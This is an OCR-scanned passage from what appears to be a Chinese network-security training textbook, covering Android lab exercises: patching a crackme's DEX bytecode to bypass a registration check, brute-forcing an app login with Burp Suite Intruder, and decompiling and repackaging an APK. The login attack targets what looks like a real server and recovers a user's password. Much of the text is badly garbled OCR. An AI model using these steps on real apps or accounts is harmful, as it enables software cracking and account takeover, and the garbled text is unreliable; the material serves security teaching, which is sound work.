nove-result-object v3 
invoke-virtual {v3}, <ref EditText.getText() imp. @ def EditText getTextiL» 
noue-result-object v3 
invoke-interface (v3), «ref Editable.toString() imp. @ def Editable toString8t» 
nove-result-object v3 
invoke-direct (v8, v2, v3), void Mainfhctivity$SNMChecker.Xinit»(ref, ref) Main&ctiuity$SHChecker init BULL》 

nàame:'checker" type:'Lcom/droider /Crackme 05 02/Maíi nhctivity$ SHChecker ; " 


invoke-uirtual (checker), <boolean Maínfctivity$SHChecker.isRegistered() Mainactiuity$SMChecker isRegisteredB2» 
noue-result v2 
it-eqz v2, loc 2D600C€ 


e "$$ opis" 


v1, aCIxjmcabsfsspp 
loc 2D8C6 


loc 2D8C6: 

-local name:'str' type-z'Ljava/lang/Stríng; " 

str * v1 

:line A46 

iget-object v2, this, Maíinfctiuity$2 this$0 
v3, 0 
(v2, str, v3), <ref Toast.nakeText(ref, ref, int) inp. @ def Toast makeTextetLt1» 
v2 

invake-uirtual (v2), «void Toast.shaw() imp. @ def Toast show» 


locret: 
.line 47 
return-void 


7-134 IDA 流程 图 


步骤 5: 虽然 不 知道 乱码 代表 的 具体 内 容 , 但 通过 直接 修改 if-eqz 即 可 破解 该 程序 。 具 
体 方法 为 : 将 光标 定位 到 if-eqz 上 , 单 击 Hex View-1 标签 ,切换 到 十 六 进 制 处 ,其 相应 的 字 
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节 码 是 “38 02 OF 00”, 所 对 应 的 地 址 是 “0002DOBE?”, 如 图 7-12 所 示 。 


38 802 ØF 8f 
96 OB 12 83 
56 QE 28 F3 E 
8^ 88 O8 HG 
5B 82 CA 82 
Bh ad AA af 


7-12. 十 六 进 制 方式 显示 


步骤 6: 将 classes. dex 文件 放 和 人 入 C32 ASM 中 ,以 十 六 进 制 打开 ,并 跳 转 到 0002DOBE 。 
随后 将 38 修改 为 39 后 保存 ,如 图 7-13 所 示 。 


Mb 文 件 (F) 编辑 (E) 搜索 (S) 查看 (V) IA) 高 级 (A) 窗口 (W) 帮助 (H) 
FH ca 4| € 9 3,2 72 702 |] 1E GE GR d dS US C3 dt 


7-13 将 38 修 改 为 39 


步骤 7: 保存 后 , 需 对 该 DEX 文件 进行 重新 校 验 ,仍然 使 用 DexFixer 工具 ,将 该 
classes. dex 文件 拖 入 DexFixer 窗口 中 ,如 图 7-14 所 示 。 


[  classes.dex.b00 2012/11/12 19:49 
| | classes.dex 2018/2/27 18:08 


IUE RADDA PERILA 
在 验证 DEX 文 件 .… 


DEC Hp SL 
DEX 文 件 SHA1 验 证 失败 


DEX 文 件 SHA1 值 已 修正 


7-14 使 用 DexFixer 工具 对 DEX 文件 进行 重新 校 验 
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步骤 8: 将 修复 好 的 classes. dex 文件 复制 到 原先 的 文件 夹 中 ,并 删除 之 前 的 签名 文件 
夹 META-INF ,然后 选择 所 有 文件 夹 并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “添加 到 压缩 文件 ” 
选项 ,如 图 7-15 所 示 。 


» 此 电脑 > 本 地 磁盘 (D:) > test > crackme0502 


修改 日 期 类 型 


2018/2/27 18:10 X 


@ UltraEdit p 
激活 加 到 压缩 文件 (A).. 


添加 到 "crackme0502.rar"(T) 
SB EEH E-mail... 


图 7-15 


步骤 9: 在 打开 的 如 图 7-16 所 示 的 对 话 框 中 ,设置 “压缩 文件 格式 ”为 ZIP 格式 ,然后 开 
Ais Hs A o 


FERE PES UO WAB)... 


更 新 方式 (W) 
mà... 添加 并 蔡 换文 件 v 


压缩 文件 格式 压缩 选项 


ORR  C 〇 RAR5 一 加) 
格式 压缩 文件 (3) 


压缩 方式 (C) 创建 固 实 压缩 文件 (5) 
添加 恢复 记录 (了 ) 
字典 大 小 (I) [nit cé Cr) 
BEENI (L) 
RE 


E MM M 
7-16 选择 ZIP 压缩 文件 格式 


步骤 10: 将 压缩 后 的 文件 后 级 . zip 修改 为 .apk。 然 后 打开 Android 逆 加 助手 ,对 该 
APK 文件 重新 签名 ,得 到 crackme0502 sign. apk 文件 ,如 图 7-17 所 示 。 

步骤 11: 安 效 重新 签名 后 的 APK 文件 。 震 要 说 明 的 是 ,在 安 闪 该 APK 文件 之 前 , 需 
要 将 原先 的 APK 文件 (本 例 为 crackme0502. apk) HIZ A Be 1E M Z . n A] 7-18 所 示 。 

步骤 12. 在 原来 的 APK 文件 卸载 完成 后 ,安装 经 逆向 助手 处 理 后 的 APK 文件 ,如 
图 7-19 所 示 。 


res 
(| AndroidManifest.xml 
Eh classes.dex 
| | crackme0502.apk 
| | crackme0502 sign.apk 


L] resources.arsc 
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TT ÍT 


2018/2/27 18:0 — xx 
2012/11/12 19:49 XML 文档 
2018/2/27 18:08 DEX 文件 
2018/2/27 18:12 APK 文件 
2018/2/27 18:13 ”APK 文件 


ARSC 文件 


Android ABRE v2.2 


选择 : 
源 文 件 : D: MtestVorackme0502 Vcr ackme0502. apk s... 


目标 文件 : D: itestiorackme0502Vcrackme0502  s1zn. apk | ius... 


HE EXER XX 
操作 : 
O RiWiXspk ” 〇 重 打包 apk (9 签名 apk o 〇 提取 dex O 蔡 换 dex O 修复 dex 
O 反 编 译 dex O 重 打 包 dex O dex 转 ddx O) dex 转 txt O dex 转 jar O jar 转 dex 


O ESDHNelE O xml 转 txt O jd 打开 jar O apk 对 齐 


18: D:\test\crackme0502\crackme0502. apk 
目标 : 了 D:\test\crackmeD502\crackme0502 sien. apk 


图 7-17 Android 逆向 助手 中 对 APK 文件 重新 进行 签名 操作 


E1 5554:test 


(3 crackme0502 


Do you want to uninstall this 
app? 


Cancel 


图 7-18  $)$x]83K BJ APK 文件 
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> 此 电脑 > HS (D:) > test > crackme0502 


APPS WIDGETS 


*' AndroidManifest.xml 2012/11/12 19:49 XML 文 栏 . 

| classes.dex 2018/2/27 18:0t DEX x14 i > Z " 

| crackme0502.apk 2018/2/27 18:1 APK x1 Y - 

$a r aea ae EG 十 二 


| crackme0502 sign.apk 
|_| resources.arsc 912/11/12 19:49 ARSC 3 API Demos Browser Calculator Calendar 


FER œ 
02>adb install crackme0502 sign. apk 2 5 | 
s in 2. 529s) 


Camera Crackme010 Crackme020 


bui \ 
\test\crackme0502> m 
o SF 
> 


crackme0502 Custom Dev Settings Dev Tools 


Locale 
T 


Downloads 


B] 7-19 安装 经 逆向 助手 处 理 后 的 APK 文件 


步骤 13. 打开 该 APK 文件 ,直接 单 击 “ 检 测 注 册 码 ”按钮 ,提示 “注册 码 正确 ”, 如 图 7-20 
所 示 。 


IE 5554:test 


a é 


crackme0502 


请 输入 注册 码 


检测 注册 码 


注册 码 正确 


图 7-20 注册 成 功 
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7.3.4 任务 与 思 


在 移动 互联 网 安全 中 ,Android 的 安全 问题 尤为 突出 。 加 强 对 Android 系统 的 逆 回 研 
究 , 是 实现 安全 管理 的 一 个 重要 方法 和 途径 。 其 中 ,Dalvik 虚拟 机 是 学 习 和 研究 Android 系 
统 逆 加 工程 时 常用 的 工具 。 

Dalvik 是 Google 公司 设计 的 用 于 Android 平台 的 虚拟 机 , 即 Dalvik VM, Dalvik 可 以 
支持 已 转换 为 . dex (Dalvik Executable) 格式 的 Java 应 用 程序 的 运行 ,. dex 格式 是 专 为 
Dalvik 设计 的 一 种 压缩 格式 ,适合 内 存 和 处 理 右 速度 有 限 的 系统 。 

Dalvik 经 过 优化 ,允许 在 有 限 的 内 存 中 同时 运行 多 个 虚拟 机 的 实例 ,并 且 每 一 个 Dalvik 
应 用 都 作为 一 个 独立 的 Linux 进程 执行 。 独 立 的 进程 可 以 防止 在 虚拟 机 崩 江 时 所 有 程序 都 

Dalvik VM 是 Android 平台 的 核心 组 成 部 分 之 一 。Dalvik VM 并 不 是 一 个 Java 虚拟 
机 ,因为 Dalvik VM 没有 遵循 Java 虚拟 机 规范 ,不 能 直接 执行 Java 的 Class 文件 ,使 用 的 是 
«fas A AE Java 虚拟 机 中 常见 的 栈 架 构 。 但 是 Dalvik VM 执行 的 . dex 文件 可 以 通 
过 Class 文件 转化 而 来 ,使 用 Java 语法 编写 应 用 程序 ,也 可 以 直接 使 用 大 部 分 的 Java 
API 等 。 

2014 4Æ 6 H 25 H , Android L 正式 推 出 。 与 早期 的 Android fH EE , Android 的 改动 
幅度 较 大 。 其 中 ,在 Android L 中 用 ART SE T Joke fi HI] Dalvik。Dalvik 是 一 个 基于 
JIT(Just in time) 编 译 的 引擎 , 即 应 用 每 次 运行 时 都 需要 通过 JIT 编译 需 将 字 节 码 转 换 为 机 
天 码 , 这 一 机 制 的 效率 并 不 高 。 使 用 Dalvik 存在 一 些 缺 点 ,所 以 从 Android 4. 4(Kitkat) 开 
始 引 入 了 ART, 从 Android 5. 0CLollipop) Hif ART 全 面 取 代 了 Dalvik, Android 7. 0 问 
ART 中 添加 了 一 个 JIT 编 诺 大, 这样 就 可 以 在 应 用 运行 时 持续 地 提高 其 性 能 。 


7.4 服务 端 漏洞 : 黎 码 找 回 逻辑 泪 洞 检测 和 重 现 


7.4.1 预备 知识 : Android 模拟 器 


使 用 模拟 颖 ,可 以 在 不 接 入 应 用 网 络 的 前 提 下 对 设备 的 各 项 性 能 进行 测试 和 调试 。 
AVD(Android Virtual Device. Android 虚拟 设备 ) 是 一 蒜 Android 模拟 器 工具 ,具有 便 件 配 
置 、 系 统 镜像 .屏幕 尺寸 ,外观 、SD 卡 等 功能 。Android SDK(Software Development Kit, 软 件 开 
发 工具 包 ) 中 提供 了 AVD 模拟 融 , 可 以 在 计算 机 上 开发 和 测试 针对 Android 的 应 用 程序 。 

Android SDK 的 下 载 地 址 为 http://tools. android-studio. org/index. php/sdk。 下 载 
解压 后 ,可 以 找到 以 下 两 个 文件 。 

(1) SDK Manager, Android 软件 开发 工具 包 管 理 硕 ,连接 本 地 和 服务 右 , 从 服务 右 下 
载 安 捍 开发 所 需要 的 工具 到 本 地 ，。 

(2) AVD Manager, Android 虚拟 驱动 管理 需 , 主 要 用 来 创建 Android $ W AF. 
Android 模拟 天 所 需 的 镜像 通过 SDK Manager 来 下 载 , 而 AVD 则 通过 AVD Manager 来 
创建 ,如 图 7-21 所 示 。 

另外 ,在 本 实验 中 还 需要 用 到 Burp Suite 工具 。Burp Suite 工具 是 用 于 攻击 Web 应 用 
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Android Virtual Device (AVD) Manager 
Tools 


Android Virtual Devices Device Definitions 


List of existing Android Virtual Devices located at CAUsersVAdministratorandroidyavd 


Target Name Platfo.. API Le... CPU/ABI 


[E] shaco Pho... Android 7.0 70 24 Intel Atom (x86 64) 


7-21 通过 AVD Manager 创建 AVD 


程序 的 集成 平台 , 它 提 供 了 多 种 功能 ,包括 请 求 的 拦截 和 修改 .扫描 Web 应 用 程序 漏洞 、 以 
暴力 破解 登录 表单 .执行 会 话 令 牌 等 。 有 关 Burp Suite 工具 的 介绍 可 见 6.1.1 节 的 内 容 。 


7.4.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 擎 握 以 下 内 容 。 

(1) APP 在 登录 时 未 考虑 穷 举 密码 的 后 来 。 

(2) Burp Suite 工具 的 应 用 。 

(3) 在 登录 时 使 用 验证 码 或 令 牌 (token) 来 禁止 用 户 重 放 数 据 。 

2. 实验 条 件 

本 实验 可 以 在 一 台 运 行 Windows XP 及 以 上 版 本 的 操作 系统 上 进行 。 同 时 ,还 需要 事 
^b x BOUE Android BEI 25 48 Burp Suite 工具 。 


7.4.3 实验 过 程 


步骤 1: 在 模拟 器 中 添加 APK 文件 。 上 暴力 破 解 漏洞 , 则 是 恶意 攻击 者 使 用 正常 的 登录 
操作 ,采用 多 组 密码 来 枚 举 该 用 户 的 密码 操作 ,直到 枚 举 到 正确 密码 为 止 。 以 baji. apk 为 
例 (在 实验 中 读者 需要 事先 准备 一 个 APK 文件 ) ,用 adb install baji. apk 将 该 程序 安装 至 
AVD 模拟 器 中 (其 中 baji. apk 为 实验 中 使 用 的 APK 文件 的 文件 名 )。 成 功 安装 后 的 界面 
如 图 7-22 所 示 。 

步骤 2: 设置 代理 。 因 为 在 运行 过 程 中 ,需要 截获 数据 包 并 进行 分 析 。 所 以 ,在 实验 用 
的 计算 机 上 需要 设置 代理 。 首 先 ,在 命令 提示 符 下 输入 “ipconfig” 命 令 查看 本 地 计算 机 的 
IP 地 址 ,具体 为 192. 168. 4. 106 ,如 图 7-23 所 示 。 


m 5554:HelloWorld 
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"d LI 2:25 Basic Controls 


000 


WIDG ETS Hardware Buttons 


©0000 


p © > fl DPAD not enabled in AVD 


Speech Widget PILET 


Recorder Preview Hardware Keyboard not enabled in AVD 


Use on screen keyboard 


图 7-22 在 模拟 器 中 安装 APK 文件 


BI C\Windows\system32\cmd.exe 


XEETEEH) DNS TEE 
本 地 PE 人 IPw6 B . . a a. i fe80::440£:603£:d84d:76aa*513 
i] 32. 168. 226. 1 


无 线 局 域 网 适配器 VLAN: 


连接 特定 的 _DNS 二 ......: 
本 地 链接 IPv6 mas sss . :fe80::85b0:1682:d36g 
IPy4 地 址 4. 106 

RR EE 


图 7-23 查看 本 机 IP 地 址 


步骤 3: 切换 到 Android 模拟 器 ,然后 依次 选择 Settings WIRELESSG-NETWORKS 
More--Mobile networks —> Access Point Names > T-Mobile US 选项 ,在 打开 对 话 框 的 


Proxy 和 Port 处 分 别 输入 代理 的 IP 地 址 192. 168. 4. 106 和 系统 


图 7-24 所 示 。 


默认 的 端口 号 8080, 如 
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Edit access point 


Name 
T-Mobile US 


APN 


epc.tmobile.com 


Proxy 
192.168.4.106 


Port 
8080 


Username 
none 


图 7-24 i£ & Proxy 和 Port 


步骤 4. 然后 打开 Burp Suite. Æ Burp Suite 界面 的 Proxy iki -E pii & fV 8k 25. 
单 击 Options 标签 , 单 击 Add 按钮 iH B" Add a new proxy listener" CAS Jr HJAR E MA Up ) fa] 
O ,在 Bind to port 中 输入 “8080”, 选中 Specific address 复 选 框 , 在 其 下 拉 列 表 中 选择 
192. 168. 4. 106 选项 ,如 图 7-25 所 示 。 然 后 , 单 击 OK 按钮 进行 确认 。 

Bl Burp Suite F 


Burp intruder Repeater Mig 


intercept | HTTP history | WebSockets history | Options 


—" 


Burp Proxy uses listeners to coming HTTP requests from your browser. You will need to configure your browser to use one of the listeners as 


Running | Interface | Invisible | Redirect | Certificate 


加 127.0.0.1:8080 g Per-host 


B! Add a new proxy listener 


Binding | Request handling | Certificate 


2j These settings control how Burp binds the proxy listener 


Each installation of Burp Bind to port: 8080| A 
another installation of Bu 


Bind to address: © Loopback only 
Import / rt CA 
, import export CA cel i dicem 
(9 Specific address: | 192.168.4.106 "| 


图 7-25 设置 burp suite 的 proxy 功能 


步骤 5; 选择 Intercept 选项 卡 , 单 击 Intercept is off OG B] PS 8O T KHZ JN, Intercept 
is on( 打 开 拦 截 ) 按 钮 ,如 图 7-26 所 示 ,等 待 数据 包 通 过 。 
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7-26 ì& & Jj intercept is on 状态 


步骤 6: 切换 到 Android 模拟 需 , 进 入 靶 机 演示 程序 ,输入 需要 进行 暴力 破解 的 用 户 名 
(如 13312312302) 和 密码 (随意 设置 ) ,然后 单 击 “登录 ”按钮 ,Burp Suite 截取 到 的 登录 数据 
包 如 图 7-27 所 示 。 


Request to http.//183.62.167 22.1080 


o WALER 


POST /app/userLogin. do?clientTypezandroi d&zoneI dz0&userldzi&uui d200000000-7d17-8fdf-9c1c-963000000000-5 dk- 4 综合 移动 APP 
Accept-Encoding: gzip, deflate 

Accept: application/ json 

Connection: close 

Referer: http://nza. jiayitong. com. en 

Content-Type: application/json; charset=UTF-8 

Content-Length: 161 


Host. 183 62 167. 22:1080 &, 13312312302 


Vser-Agent: okhttp/3. 4.1 


["clientTrpe": "android", "userId": "1", "userLoginllane": 13312312302", "userPassword": 


后 1 密码 ? 


7-27 Burp Suite 截取 到 的 登录 数据 包 


步骤 7: 然后 将 该 数据 包 发 送 到 Intruder 功能 上 。 在 数据 包 区 域 右 击 , 在 出 现 的 快捷 沫 
单 中 选择 Send to intruder 选项 或 按 Ctrl 十 1 组 合 键 , 如 图 7-28 所 示 。 


POST /app/userLlogin. do?clientType-androi dézoneld-Ükuserld-lEuuid-f£44£4£f£-c99d-6£bc-3580-a03229514£4 1-HUATEIS?^0MLA-AL10-4.4. 2-19 HTTP/1.1 
Accept: application/json 

Connection: close 

Referer: http: //nxa. jiayitong. com. cn 

Content-Type: application/json; charset-UTF-8 

Content-Length: 175 

Host: 183.62. 167. 22:1080 

User-Agent: okhttp/3.4.1 


"clientType ": "android", "userId": "1", "userLoginName": ^ n2" 7 Pazeunrd "222222" “unid”: £fffffff-c99d-6fbc-3b80-a03229514f4 ]- HUATEI 
NLA-AL 10-4. 4. 2-19", "zoneId": "0") 


7-28 将 该 数据 包 发 送 到 intruder 功能 上 


212 网 络 攻击 与 防御 实 训 


步骤 8: 在 Intruder 选项 卡 中 ,打开 Positions 选项 卡 , 先 单 击 右 边 的 Clear $ 按钮 将 所 
有 的 变量 清除 ,如 图 7-29 所 示 。 


[reme [s T sper scanner [imag repeater [ sequencer [ Decoder | comparer [ extender [memores J useropions 1 


Payad Positions 


sre the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are assigned to payload positions - 


; application/json 
Connection: close 
Referer: http: //nxa. jiayitong. com. en 
Content-Type: application/json; charset-UTF-8 
Content-Length: 175 
Host: 183. 62.167.22.1080 
User-Agent: okhttp/3 4. 1 


"clientType": "android", "usexId": "1^, "usexLoginName ": "13312312302", “userPassword 222222", “uuid”: "ffff£f1££-c99d-67b5c-3580-a032295 
14£41-HUAXEI MLA-AL10-4.4. 2-19", “zoneId : 0°} 


图 7-29 消除 所 有 变量 


步 又 9: 然后 选取 输入 密码 段 ( 本 实验 为 "222222”) , 单 击 右边 的 Add $ 按钮 ,将 该 密码 
字段 设置 为 一 个 变量 ,如 图 7-30 Bron. 


Payload Positions 


Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are assigned to payload positions - 
see help for full details 


POST /app/userLorin. do?clientType-androidÉzoneId-ÜfRuserId-1&uuid-ffffffff£-c99d-6fbc-3580-a03229514 £4 1- HUATET&20NLA-AL 10-4. 4. 3- 
HITP/1.1 

Accept: application/json 

Connection: close 

Referer: http: //nxa. jiayitong. com. cn 

Content-Type: application/json; charset=UTF-8 


Content-Length: 175 
Host; 183. 62. 167. 22: 1080 
User-Agent: okhttp/3.4.1 


["clientType": "android", "userId": "1", "userLoginName": "13312312302", "userPassword": "8222999", "uuid": "£f£f££f£f-c99d-6£bc-3b80-a03 
229514f41-HUATEI MLA-AL 10-4. 4. 2-19”, "zoneId": "0"] 


7-30 将 密码 字段 设置 为 一 个 变量 


步骤 10: 然后 在 Payloads 选项 卡 中 ,选择 需要 进行 又 力 破解 的 字典 ,如 图 7-31 所 示 。 

步骤 11: 然后 根据 又 力 破解 设置 相应 的 线程 数 和 并 发 数 ,如 图 7-32 所 示 。 单 击 Start 
attack 按钮 ,开始 进行 桑 力 破解 攻击 。 

步骤 12: 等 竺 一段 时 间 , 单 击 Results 标签 ,如 果 枚 举 到 了 正确 的 用 户 名 和 密码 ,将 会 
显示 在 中 间 的 列表 框 中 。 本 实验 中 , 枚 举 到 的 正确 的 密码 是 123456 (与 实验 当时 账号 实际 
密码 一 致 ) ,如 图 7-33 所 示 。 


7.4.4 任务 与 思考 


在 乔 能 移动 终端 密码 找 回 过 程 中 可 能 出 现 以 下 现象 。 
(1) BR EWERS ,容易 被 骏 力 破解 。 
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Paylogff Sets 
E Yoyčan define one or more payload sets. The number of payload sets depends on the attack type defined in the Positions tab. Various payload types are available fo 
afich payload set, and each payload type can be customized in different ways. 


Payload set: [1 vj Payload count: 23,394 
— Request count: 23394 


Payload Options [Simple list] 


This payload type lets you configure a simple list of strings that are used as payloads. 


Enter a new item 


图 7-31 选择 暴力 破解 使 用 的 字典 


CC 
Target | postions | payioaas [ Optens. 


Request Headers 


(dj These settings control whether Intruder updates the configured request headers during attacks. 


(Z) Update Content-Length header 
(Z) Set Connection: close 


Request Engine 


(uj These settings control the engine used for making HTTP requests when performing attacks. 


Number of retries on network failure: peruana 


Pause before retry (miliseconds): 2000 
0 


Throttle (miliseconds): @ Fixed 


© Variable: start |0 


7-32 设置 相应 的 线程 数 和 并 发 数 


(2) 密码 找 回 和 凭证 可 以 从 客户 端 \URL 中 下 接 获取 。 

(3) 密码 找 回 凭证 可 以 在 网 页 源 代 码 中 直接 获取 。 

(4) 密码 找 回 的 邮箱 链接 易 猜 解 , 如 对 应 时 间 的 md5 值 等 。 

(5) 密码 找 回 的 手机 或 邮箱 从 页 面 获取 ,可 以 通过 Firebug 修改 。 其 中 , Firebug 是 
Mozilla Firefox 下 的 一 款 开发 类 扩展 , 它 包 括 HTML 查看 和 编辑 、JavaScript 控制 台 、 网 络 
状况 监视 颖 等 功能 ,是 开发 JavaScript、CSS、HTML 和 Ajax 的 有 效 工 具 。 通 过 Firebug ,还 
可 以 从 各 个 不 同 角度 前 析 Web 页 面 内 部 的 细节 层面 ,给 Web 开发 者 市 来 便利 。 

(6) 最 后 提交 新 密码 时 的 修改 用 户 ID 为 其 他 ID. 
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Intruder attack 1 s 口 x 


O -a 
口 Q 
口 日 
口 . 
口 日 
口 o 
Q 口 
口 口 
口 口 
口 口 
口 口 
口 口 


Referer: http: //nxa. jiayitong. com. cn 
Content-Type: application/json; charset=UTF-8 


User-Agent: okhttp/3.4.1 


U'clientType": "android", "userlId": "1", "userLoginName : "13312312302", "userPassword : 123456", "uuid": "ff£ffffff-c99d-6fbc-3b80-a03229514£ 
41-HUATEI MLA-AL10-4. 4. 2-19", "zoneId": "0") 


[2 (<) Le) (>) Type a search term 0 matches 


20157 of 23394 上 


图 7-33 显示 已 被 暴力 破解 的 用 户 名 (手机 号 码 ) 和 密码 


7.5 Denik E i A E 


7.5.1 预备 知识 : 反 编 译 


计算 机 软件 逆 问 工程 (Reverse Engineering) 也 称 为 计算 机 软件 还 原 工 程 ,是 指 通 过 对 
他 人 软件 的 目标 程序 (如 可 执行 程序 ) 进 行 逆 回 分析 工作 ,以 推导 出 他 人 的 软件 产品 所 使 用 
的 思路 . 原理、 结构、 算法 、 处理 过 程 、 运 行 方法 等 设计 要 素 , 某 些 特定 情况 下 可 能 推导 出 源 
代码 。 

反 编 译 漏洞 是 因为 APP 在 开发 完成 后 ,未 进行 任何 加 固 措施 而 导致 恶意 攻击 者 可 以 查 
看 该 APP 的 运行 流程 。 算 改 汤 洞 是 因为 APP 在 开发 完成 后 ,未 进行 任何 加 固 措施 而 导致 
恶意 攻击 者 可 以 在 该 APP 的 基础 上 任意 修改 任何 文件 ,如 重新 签名 和 发 布 。 本 实验 中 检测 
反 编 译 漏洞 的 流程 以 APK 为 例 。 


7.5.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,要求 读 者 主要 掌握 以 下 内 容 。 
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C) APP 程序 的 反 编译 和 算 改 漏洞 的 检测 和 重 现 方 法 。 
(2) 如 何 使 用 加 固 方 案 对 APK 进行 加 固 , 防 止 二 次 打包 。 


2. 实验 条 件 
本 实验 在 一 台 运 行 Windows XP 及 以 上 版 本 的 操作 系统 上 进行 ,在 具体 实验 之 前 ,需要 
安装 “ 安 晶 逆向 助手 ”> 和 “APK 改 之 理 (APK IDE)? 两 款 工 具 软 件 。 


7.5.3 实验 过 程 


步骤 1: 打开 Android 逆向 助手 ,选中 *dex 转 jar” 单 选 按 钮 ,然后 将 需要 进行 逆 问 分 析 

的 APP( 需 要 在 实验 前 准备 好 ,本 实验 中 使 用 的 文件 名 为 crackme02. apk) 导 入 程序 源 文 件 ， 

从 该 java 代码 中 可 以 很 清楚 地 看 到 程序 的 运行 流程 ,如 图 7-34 所 示 。 如 果 需 要 对 该 代码 进 
行 修改 ,需要 更 改 smali 代码 。 


($) Java Decompiler - MainActivity.class 
ile Edit Navigate Search Help 


Svr aa localStringBuilder = new StringBuilder(); 
int ramArrayOfByte.length: 
fo E ins a 0; ; j+) 
l 
ir (j >= 1) 
return —Á— z 
ing str = Integer.toHexString(OxFF & paramArrayofDyte[j]); 
Iw. NE. String) : boolea 
-@ onCreate(Bundle) : void 
| onCreateOptionsMenu(Menu) : bx 
i af pa [l String) : String 


uum c void onCreate (Bundle paramBundle) 


super viua -— ea e); 
se — ntView( 40): 
299940211 
= ((EditText) findViewById(2131230721)); 
.e S 一 m tIex a umeris AERA 
i = ((Button)findViewById(2131230723)); 
.SetOnClickListener (new View.OnClickListener() 


i 
public void onClick (View paramView) 
I 


if ('MainActivity.this.checkSN(MainActivizy.this.edit userName.getIext(|.toString().trim(), MainActivity.this.edit_sn.getText{).toString(}.trim{})})} 
{ 


Toast.makeText(MalnActivity.this, 2131034123, 0}) .show(); 
return; 


this — ho show() : 
gis .btn settnab led(fa 
MER ectirle (21310 34122): 
} 
ES 
) 


7-34 将 APP 导 入 程序 源 文件 


步骤 2: 重 现 贷 改 漏 洞 。 首 先 对 其 中 的 某 个 字段 进行 算 改 ,将 其 安装 到 虚拟 机 ,具体 命 
令 为 “adb install crackme02. apk”( 其 中 crackme02. apk 为 本 实验 中 使 用 的 APK 文件 的 文 
件 名 ) ,如 图 7-35 所 示 。 

步骤 3: 运行 该 APK 文件 后 ,直接 单 击 “注册 ”按钮 ,系统 提示 "无 效用 户 名 或 注册 码 ”， 
如 图 7-36 所 示 。 

步骤 4: 切换 到 “APK 改 之 理 ” 界 面 ,将 该 APP 调 人 “APK 改 之 理 ? 程 序 中 ,并 打开 
Androidmanifest. xml 文件 ,如 图 7-37 所 示 。 其 中 ,“APK 改 之 理 ” 是 一 蒜 可 视 化 的 集 APK 
反 编译 ,APK 查 充 、 加 密 解 密 、APK 调试 分 析 、APK 打包 、APK 签名 为 一 体 的 Android 
APK 反 汇 编 工具 ,简化 了 APK 修改 过 程 中 的 烦琐 操作 。 

步骤 5: 打开 /res/values/strings. xml 找到 “注册 ”按钮 对 应 的 字段 ,将 其 对 应 的 信息 修 
改 为 无 效用 户 名 或 注册 码 , 呼 呼 哈 嘿 ” ,然后 保存 ,如 图 7-38 Bron. 

步骤 6: 选择 “编译 ”一 “重新 生成 Apk” 选 项 ,对 刚才 被 修改 后 的 APK 进行 二 次 打包 ， 
如 图 7-39 所 示 。 
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Basic Controls 


WIDGETS 


API Demos Browser Calculator Calendar 


Hardware Keyboard not enable 
Use on screen keyboard 


"s 


Clock Crackme010 Crackme020 
] 


‘2adb install crackme02. apk 
)/s (157408 bytes in 2. 5013s) 
pkg: /data/local/tmp/crackme02. apk 


7-35  crackme02, apk 安装 到 虚拟 机 


B ' 5554:test 


程序 未 注册 
Androld 程 序 破解 演示 买 例 


用 户 名 : | 请 输入 用 户 名 | 


注册 码 : ， 请 输入 16 位 的 注册 码 


UE di 


效用 户 名 或 注册 码 


7-36 单 击 “注册 ”后 出 现 的 提示 信息 
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4 APKKK 之 理 31.00 

ME WE WFL ADB SEV IRD ERAS) TR) #MH) 

1-131-8R- IR" RECNCEUNN ag LEE 3-83 | us-ascii -BH Ga3X 
(2 MB « Start java * Androi Manifest. xn] P MainActivi ty. smali] 


^ 


0" encoding*"utf-8" standalone*"no"?»«manifest xmlns:androide"http://schemas,.^android.com/apk/res/a&ndro 


<?xml version*":. 


1 
Ver: 1.061) 一 «application android:debuggable-"rrue" android:icon-z"Gdrawable/ic launcher" android:label-"Gsrtring/app name" androi4 
Package: com. droi der. crackse(201 «activity android:labele€"G8string/title activity main" android:namee".MainActivity"» 
: h <intent-filter> 
: «action android:namee"android.intent.action.MAIN"/» 
BIEGA tex 


«category android:namee"andrcid.intent.category.LAUNCHER"/» 
日- 国 com droider. crackne0701 «/intent-filter» 

| LJ Androl dlani fest. xm «/activity» 
iL] apktool. yel «/application» 
由 © original «/manifest» 
EC res 
EH sai 

四 -EY android 

日 [EL 

EJ droider 
e» er ackne0201 
i8) BuildConfig smali 


| B$attr. smali 

" 图 R$dinen. sn ali 

六 图 Bidrawable. «nali 
一 图 R$id mali 

;S| Blayout. snali 


7-37 将 APK 文件 导入 “APK KZE’ IR 


& APKeILZIB 3.1.0.0 
项 目 (P) SE) FB) ADB HAV IAD ”皮肤 (S) ”参考 (Rj ”帮助 (H) 
: E2 ES (2 C3: id ia [3a 4 0 9 00 C9 1 [S LI utfs -OSAA 


P EB X Start. java|* Androi Mani fest. xml | Mainhotivity, smali * strings. xml 


<?xml version-"1.0" encoding-"utf-8"?» 
«resources» 
«string namee"app name"»Crackme0201«/string» 
«string name="menu serttings"»Settings«/string» 
«string name-"ritle activity main"»Crackme0201«/string» 
«string name="infto">Android 程 序 破解 演示 实例 </string> 
<string name="username"> 用 户 名 : </string> 
«string name-"sn"»irHjb 52: «/string» 
«string name-"register"»j3E 册 </string> 
«string name-"hint username"> 请 输入 用 户 名 </string> 
<string names"hint sn"> 请 输入 16 位 的 注册 码 </string> 
«svring name="unregisater"> 程 序 未 注册 </string> 
t <string name="registered"> 程 序 已 注册 </string> 
H- drawablemdpi—v4 <string name="unsucce33ed"> 无 效用 户 名 或 注册 码 ， m$ US pA P D! «/string» 
由 .名 dr awable-xhdpi-v4 «string namee"successed"» 35 E! 注册 成 功 </string> 
由 -入 layout </resources> 
由 -全 menu 
提包 rdws 
i = |] dimens. xml 
ids. xal 
public. xml 
: strings. xml 
j LB styles. xml 
”由 -人 values-large 一 4 
BC mdi 


Cr ackme0201 
Ver: 1.0(1) 
Package: con. droider. crackme0201 


: i 1 e e Xx 


E-[g com.droider. erackme0201 
— [1 Androi dMani fest. xml 
^| | apktool. yml 
Ec original 
e res 
由 .全 drawable-hdpi-v4 
9 drawable-ldpi-—4 


O iw O -J ó U ^5 Q Nl 


M og jab de pg 
indb Ww N H 


m 
-J 


7-38 将 “注册 ”按钮 对 应 的 字段 信息 改 为 "无效 用户 名 或 注册 码 , 哼 哼哈 嘿 ” 


& APK 改 之 理 3.1.0.0 
